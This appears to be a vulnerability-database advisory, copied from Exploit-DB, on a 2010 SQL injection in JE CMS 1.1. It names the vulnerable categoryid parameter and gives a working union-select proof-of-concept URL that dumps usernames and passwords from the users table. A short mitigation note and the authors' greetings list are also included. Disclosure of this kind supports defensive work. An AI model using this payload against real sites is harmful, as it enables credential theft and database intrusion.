JE CMS SQL Injection Vulnerability

vendor:

JE CMS

by:

AntiSecurity

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: JE CMS

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:joenasejes:je_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

JE CMS SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database. This can be done by appending the malicious SQL statement to the vulnerable parameter in the HTTP request. For example, http://localhost/[path]/index.php?jepage=viewcategory&categoryid=[sql] and http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==========================================================================================================================================================


  [o] JE CMS SQL Injection Vulnerability
 
       Software : JE CMS version 1.1
       Vendor   : http://joenasejes.cz.cc/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


==========================================================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?jepage=viewcategory&categoryid=[sql]


  [o] PoC

       http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users--


==========================================================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
       ArRay bjork xmazinha & all people in #evilc0de [at] irc.byroe.net


==========================================================================================================================================================


  [o] May 17 2010 - GMT +07:00 Jakarta, Indonesia